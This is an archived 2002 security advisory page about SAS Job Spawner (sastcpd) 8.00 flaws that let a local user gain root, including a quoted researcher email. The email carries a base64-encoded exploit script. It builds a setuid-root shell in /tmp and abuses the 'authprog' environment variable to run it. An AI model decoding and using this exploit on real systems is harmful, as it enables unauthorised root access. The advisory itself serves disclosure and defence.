SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   SAS Vendors:   SAS Institute Inc.
(Additional Vulnerabilities Are Reported) Re: SAS Job Spawner Buffer Overflow and Format String Bug Let Local Users Execute Arbitrary Code on the System with Root Privileges and Gain Root Privileges on the System
SecurityTracker Alert ID:  1003406
SecurityTracker URL:  http://securitytracker.com/id/1003406
CVE Reference:   CVE-2002-2018   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Jan 31 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): SAS Job Spawner for Open Systems 8.00
Description:   A vulnerability was reported in the SAS Job Spawner (sastcpd). A local user can obtain root privileges on the system.

In addition to the vulnerability reported by Ministry-of-Peace in the original alert, a new vulnerability has been reported.

The original vulnerability was in passing long command line arguments to sastcpd, causing arbitrary code to be executed with root privileges. See the earlier alert for details.

The newly reported vulnerabilities involve a local user setting an environment variable to a certain value to cause arbitrary code to be executed. It is reported that a local user can set the 'authprog' environment variable which is passed to execve(), allowing the local user to execute arbitrary commands with root privileges. A demonstration exploit script is provided (it is Base64 encoded within the Source Message).

It is also reported that a remote user can cause sastcpd to crash if the 'netencralg' environment variable is set to any value.

All test were run on SunOS 5.8.

Impact:   A local user can execute arbitrary code on the system with root level privileges, giving that user root access on the system.
Solution:   The vendor issued a fix for other SAS Job Spawner vulnerabilities in verion 8.2. It is not clear if these newly reported vulnerabilites are also corrected in version 8.2. If the vendor clarifies, we will update this entry.
Vendor URL:  www.sas.com/SASHome.html (Links to External Site)
Cause:   Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on SunOS 5.8

Message History:   This archive entry is a follow-up to the message listed below.
Jan 29 2002 SAS Job Spawner Buffer Overflow and Format String Bug Let Local Users Execute Arbitrary Code on the System with Root Privileges and Gain Root Privileges on the System



 Source Message Contents

Subject:  sastcpd 8.0 'authprog' local root vulnerability


--=.g8ZC'15jPPYm)M
Content-Type: multipart/mixed;
 boundary="Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518"


--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Hi,

Several environment variable problems exist in the 'SAS Job Spawner for Open Systems version 8.00'. No other releases of the software
 were available to test. Sorry.

authprog vulnerability
----------------------

The daemon passes a user-defined environment variable, 'authprog', to execve(). This obviously is a problem if sastcpd is setuid.
 A sample 'exploit' is attached.

netencralg vulnerability
------------------------

I haven't poked at this long enough to determine whether or not it is exploitable. sastcpd segfaults if 'netencralg' is set to any
 value.

All test were run on SunOS 5.8.
Both vulnerabilities were discovered with Dave Aitel's/AtStake simple-yet-sexy sharefuzz 1.0.

cheers,
--rpc
--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518
Content-Type: text/x-sh;
 name="authme.sh"
Content-Disposition: attachment;
 filename="authme.sh"
Content-Transfer-Encoding: base64

IyEvYmluL2Jhc2gKIyBzYXN0Y3BkIDguMCAnYXV0aHByb2cnIHZ1bG5lcmFiaWxpdHkuCiMgcnBj
IDxycGNAdW5ob2x5Lm5ldD4gfHwgPGhAY2t6Lm9yZz4KIyBUaGFua3Mgc2hhcmVmdXp6IQoKY2F0
IDw8RU9UID4vdG1wL2hlc2guYwppbnQKbWFpbih2b2lkKQp7CglzZXR1aWQoMCk7CglzZXRnaWQo
MCk7CglleGVjbCgiL2Jpbi9rc2giLCAia3NoIiwgKGNoYXIgKikwKTsKfQpFT1QKCmNhdCA8PEVP
VCA+L3RtcC9oZWguYwppbnQKbWFpbih2b2lkKQp7CglzZXR1aWQoMCk7CglzZXRnaWQoMCk7Cglz
eXN0ZW0oImNob3duIDA6MCAvdG1wL2hlc2giKTsKCXN5c3RlbSgiY2htb2QgNDc1NSAvdG1wL2hl
c2giKTsKCXJldHVybiAwOwp9CkVPVAoKZ2NjIC1vIC90bXAvaGVoIC90bXAvaGVoLmMKZ2NjIC1v
IC90bXAvaGVzaCAvdG1wL2hlc2guYwoKZXhwb3J0IGF1dGhwcm9nPS90bXAvaGVoCi9wYXRoL3Rv
L3Nhcy91dGlsaXRpZXMvYmluL3Nhc3RjcGQKCnNsZWVwIDEKcm0gL3RtcC9oZSouYwpybSAvdG1w
L2hlaAovdG1wL2hlc2gK

--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518--

--=.g8ZC'15jPPYm)M
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)

iD8DBQE8WOcBKfBLFoWw9OURAkWhAJ9VIwND5dVN71rG//BADTcKQX095ACcCoqr
OX5KbLfH2tRi7Plamt/ObFE=
=QSeD
-----END PGP SIGNATURE-----

--=.g8ZC'15jPPYm)M--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC